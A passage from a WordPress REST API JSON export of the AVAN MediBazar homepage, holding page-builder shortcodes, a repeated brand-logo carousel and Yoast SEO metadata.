custom_links=”#E-8_aHR0cHMlM0ElMkYlMkZhdmFubWVkaWJhemFyLmNvbSUyRnByb2R1Y3QtY2F0ZWdvcnklMkZhbGwtYnJhbmRzJTJG”][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner][vc_btn title=”Our Valued Customers” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1622552515042{border-radius: 4px !important;}”]<div id=\"brands_8247\" class=\"brands-items-wrapper brands-widget slider-brands_8247 brands-carousel brands-hover-default brands-style-default woodmart-carousel-container woodmart-carousel-spacing-0\" data-owl-carousel data-wrap=\"no\" data-autoplay=\"\" data-hide_pagination_control=\"no\" data-hide_prev_next_buttons=\"no\" data-desktop=\"3\" data-tablet_landscape=\"3\" data-tablet=\"2\" data-mobile=\"1\"><div class=\" owl-carousel owl-items-lg-3 owl-items-md-3 owl-items-sm-2 owl-items-xs-1\"><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=vitra\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Vitra\" alt=\"Vitra\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=magisso\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Magisso.png\" title=\"Magisso\" alt=\"Magisso\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=louis-poulsen\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Louis-Poulsen.png\" title=\"Louis Poulsen\" alt=\"Louis Poulsen\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=klober\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-klober.png\" title=\"KL\u00d6BER\" alt=\"KL\u00d6BER\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=joseph-joseph\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Joseph-Joseph.png\" title=\"Joseph Joseph\" alt=\"Joseph Joseph\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=hay\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-hay.png\" title=\"Hay\" alt=\"Hay\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=flos\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-flos.png\" title=\"Flos\" alt=\"Flos\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=eva-solo\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Eva Solo\" alt=\"Eva Solo\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=alessi\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-alessi.png\" title=\"Alessi\" alt=\"Alessi\" \/><\/a><\/div><\/div><\/div><div id=\"brands_7222\" class=\"brands-items-wrapper brands-widget slider-brands_7222 brands-carousel brands-hover-default brands-style-default woodmart-carousel-container woodmart-carousel-spacing-0\" data-owl-carousel data-wrap=\"no\" data-autoplay=\"\" data-hide_pagination_control=\"no\" data-hide_prev_next_buttons=\"no\" data-desktop=\"3\" data-tablet_landscape=\"3\" data-tablet=\"2\" data-mobile=\"1\"><div class=\" owl-carousel owl-items-lg-3 owl-items-md-3 owl-items-sm-2 owl-items-xs-1\"><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=vitra\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Vitra\" alt=\"Vitra\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=magisso\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Magisso.png\" title=\"Magisso\" alt=\"Magisso\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=louis-poulsen\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Louis-Poulsen.png\" title=\"Louis Poulsen\" alt=\"Louis Poulsen\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=klober\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-klober.png\" title=\"KL\u00d6BER\" alt=\"KL\u00d6BER\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=joseph-joseph\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Joseph-Joseph.png\" title=\"Joseph Joseph\" alt=\"Joseph Joseph\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=hay\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-hay.png\" title=\"Hay\" alt=\"Hay\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=flos\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-flos.png\" title=\"Flos\" alt=\"Flos\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=eva-solo\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-Eva-Solo.png\" title=\"Eva Solo\" alt=\"Eva Solo\" \/><\/a><\/div><div class=\"brand-item\"><a href=\"https:\/\/avanmedibazar.com\/shop\/?filter_brand=alessi\"><img src=\"https:\/\/avanmedibazar.com\/wp-content\/uploads\/2017\/06\/brand-alessi.png\" title=\"Alessi\" alt=\"Alessi\" \/><\/a><\/div><\/div><\/div>[\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row][vc_column][vc_row_inner][vc_column_inner][vc_btn title=”” style=”3d” color=”primary” size=”lg” align=”center” button_block=”true” css=”.vc_custom_1623171320329{border-radius: 4px !important;}”][\/vc_column_inner][\/vc_row_inner][vc_empty_space woodmart_hide_large=”0″ woodmart_hide_medium=”0″ woodmart_hide_small=”0″ woodmart_hide_extra_small=”0″][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css=”.vc_custom_1497436304841{margin-top: -30px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}” el_class=”hidden-lg”][vc_column css=”.vc_custom_1496150831147{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width:<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Home - AVAN MediBazar<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/avanmedibazar.com\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Home - AVAN MediBazar\" \/>\n<meta property=\"og:description\" content=\"[vc_row css=”.vc_custom_1497436304841{margin-top: -30px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}” el_class=”hidden-lg”][vc_column css=”.vc_custom_1496150831147{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width:\" \/>\n<meta property=\"og:url\" content=\"https:\/\/avanmedibazar.com\/\" \/>\n<meta property=\"og:site_name\" content=\"AVAN MediBazar\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T06:28:36+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"14 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/avanmedibazar.com\/#website\",\"url\":\"https:\/\/avanmedibazar.com\/\",\"name\":\"AVAN MediBazar\",\"description\":\"AVAN MediBazar\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/avanmedibazar.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/avanmedibazar.com\/#webpage\",\"url\":\"https:\/\/avanmedibazar.com\/\",\"name\":\"Home - AVAN MediBazar\",\"isPartOf\":{\"@id\":\"https:\/\/avanmedibazar.com\/#website\"},\"datePublished\":\"2017-06-23T07:54:20+00:00\",\"dateModified\":\"2022-12-21T06:28:36+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/avanmedibazar.com\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/avanmedibazar.com\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/avanmedibazar.com\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/avanmedibazar.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Home\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Home - AVAN MediBazar","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/avanmedibazar.com\/","og_locale":"en_US","og_type":"article","og_title":"Home - AVAN MediBazar","og_description":"[vc_row css=”.vc_custom_1497436304841{margin-top: -30px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}” el_class=”hidden-lg”][vc_column css=”.vc_custom_1496150831147{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width:","og_url":"https:\/\/avanmedibazar.com\/","og_site_name":"AVAN MediBazar","article_modified_time":"2022-12-21T06:28:36+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"14 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/avanmedibazar.com\/#website","url":"https:\/\/avanmedibazar.com\/","name":"AVAN MediBazar","description":"AVAN MediBazar","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/avanmedibazar.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/avanmedibazar.com\/#webpage","url":"https:\/\/avanmedibazar.com\/","name":"Home - AVAN MediBazar","isPartOf":{"@id":"https:\/\/avanmedibazar.com\/#website"},"datePublished":"2017-06-23T07:54:20+00:00","dateModified":"2022-12-21T06:28:36+00:00","breadcrumb":{"@id":"https:\/\/avanmedibazar.com\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/avanmedibazar.com\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/avanmedibazar.com\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/avanmedibazar.com\/"},{"@type":"ListItem","position":2,"name":"Home"}]}]}},"_links":{"self":[{"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/pages\/492"}],"collection":[{"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/comments?post=492"}],"version-history":[{"count":736,"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/pages\/492\/revisions"}],"predecessor-version":[{"id":5643,"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/pages\/492\/revisions\/5643"}],"wp:attachment":[{"href":"https:\/\/avanmedibazar.com\/wp-json\/wp\/v2\/media?parent=492"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}